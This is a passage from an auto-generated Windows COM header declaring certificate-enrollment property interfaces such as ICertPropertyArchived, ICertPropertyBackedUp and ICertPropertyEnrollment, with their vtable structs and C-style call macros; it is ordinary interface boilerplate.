        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in ICertPropertyKeyProvInfo * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        END_INTERFACE
    } ICertPropertyKeyProvInfoVtbl;

    interface ICertPropertyKeyProvInfo
    {
        CONST_VTBL struct ICertPropertyKeyProvInfoVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyKeyProvInfo_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyKeyProvInfo_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyKeyProvInfo_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyKeyProvInfo_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyKeyProvInfo_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyKeyProvInfo_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyKeyProvInfo_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyKeyProvInfo_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyKeyProvInfo_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyKeyProvInfo_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyKeyProvInfo_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyKeyProvInfo_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyKeyProvInfo_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyKeyProvInfo_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyKeyProvInfo_Initialize(This,pValue)	\
    ( (This)->lpVtbl -> Initialize(This,pValue) ) 

#define ICertPropertyKeyProvInfo_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyKeyProvInfo_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyArchived_INTERFACE_DEFINED__
#define __ICertPropertyArchived_INTERFACE_DEFINED__

/* interface ICertPropertyArchived */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyArchived;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab337-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyArchived : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ VARIANT_BOOL ArchivedValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Archived( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyArchivedVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyArchived * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyArchived * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyArchived * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyArchived * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyArchived * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ VARIANT_BOOL ArchivedValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Archived )( 
            __RPC__in ICertPropertyArchived * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        END_INTERFACE
    } ICertPropertyArchivedVtbl;

    interface ICertPropertyArchived
    {
        CONST_VTBL struct ICertPropertyArchivedVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyArchived_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyArchived_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyArchived_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyArchived_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyArchived_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyArchived_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyArchived_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyArchived_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyArchived_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyArchived_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyArchived_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyArchived_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyArchived_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyArchived_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyArchived_Initialize(This,ArchivedValue)	\
    ( (This)->lpVtbl -> Initialize(This,ArchivedValue) ) 

#define ICertPropertyArchived_get_Archived(This,pValue)	\
    ( (This)->lpVtbl -> get_Archived(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyArchived_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyBackedUp_INTERFACE_DEFINED__
#define __ICertPropertyBackedUp_INTERFACE_DEFINED__

/* interface ICertPropertyBackedUp */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyBackedUp;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab338-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyBackedUp : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCurrentTime( 
            /* [in] */ VARIANT_BOOL BackedUpValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ VARIANT_BOOL BackedUpValue,
            /* [in] */ DATE Date) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_BackedUpValue( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_BackedUpTime( 
            /* [retval][out] */ __RPC__out DATE *pDate) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyBackedUpVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyBackedUp * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyBackedUp * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyBackedUp * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCurrentTime )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL BackedUpValue);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL BackedUpValue,
            /* [in] */ DATE Date);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_BackedUpValue )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_BackedUpTime )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [retval][out] */ __RPC__out DATE *pDate);
        
        END_INTERFACE
    } ICertPropertyBackedUpVtbl;

    interface ICertPropertyBackedUp
    {
        CONST_VTBL struct ICertPropertyBackedUpVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyBackedUp_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyBackedUp_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyBackedUp_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyBackedUp_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyBackedUp_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyBackedUp_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyBackedUp_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyBackedUp_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyBackedUp_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyBackedUp_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyBackedUp_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyBackedUp_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyBackedUp_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyBackedUp_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyBackedUp_InitializeFromCurrentTime(This,BackedUpValue)	\
    ( (This)->lpVtbl -> InitializeFromCurrentTime(This,BackedUpValue) ) 

#define ICertPropertyBackedUp_Initialize(This,BackedUpValue,Date)	\
    ( (This)->lpVtbl -> Initialize(This,BackedUpValue,Date) ) 

#define ICertPropertyBackedUp_get_BackedUpValue(This,pValue)	\
    ( (This)->lpVtbl -> get_BackedUpValue(This,pValue) ) 

#define ICertPropertyBackedUp_get_BackedUpTime(This,pDate)	\
    ( (This)->lpVtbl -> get_BackedUpTime(This,pDate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyBackedUp_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyEnrollment_INTERFACE_DEFINED__
#define __ICertPropertyEnrollment_INTERFACE_DEFINED__

/* interface ICertPropertyEnrollment */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyEnrollment;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab339-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyEnrollment : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in BSTR strCADnsName,
            /* [in] */ __RPC__in BSTR strCAName,
            /* [defaultvalue][in] */ __RPC__in BSTR strFriendlyName = 0) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RequestId( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CADnsName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CAName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_FriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyEnrollmentVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyEnrollment * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyEnrollment * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyEnrollment * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in BSTR strCADnsName,
            /* [in] */ __RPC__in BSTR strCAName,
            /* [defaultvalue][in] */ __RPC__in BSTR strFriendlyName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestId )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CADnsName )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CAName )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyEnrollmentVtbl;

    interface ICertPropertyEnrollment
    {
        CONST_VTBL struct ICertPropertyEnrollmentVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyEnrollment_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyEnrollment_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyEnrollment_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyEnrollment_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyEnrollment_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyEnrollment_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyEnrollment_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyEnrollment_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyEnrollment_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyEnrollment_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyEnrollment_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyEnrollment_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyEnrollment_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyEnrollment_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyEnrollment_Initialize(This,RequestId,strCADnsName,strCAName,strFriendlyName)	\
    ( (This)->lpVtbl -> Initialize(This,RequestId,strCADnsName,strCAName,strFriendlyName) ) 

#define ICertPropertyEnrollment_get_RequestId(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestId(This,pValue) ) 

#define ICertPropertyEnrollment_get_CADnsName(This,pValue)	\
    ( (This)->lpVtbl -> get_CADnsName(This,pValue) ) 

#define ICertPropertyEnrollment_get_CAName(This,pValue)	\
    ( (This)->lpVtbl -> get_CAName(This,pValue) ) 

#define ICertPropertyEnrollment_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyEnrollment_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyRenewal_INTERFACE_DEFINED__
#define __ICertPropertyRenewal_INTERFACE_DEFINED__

/* interface ICertPropertyRenewal */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyRenewal;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33a-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyRenewal : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EncodingType Encoding,
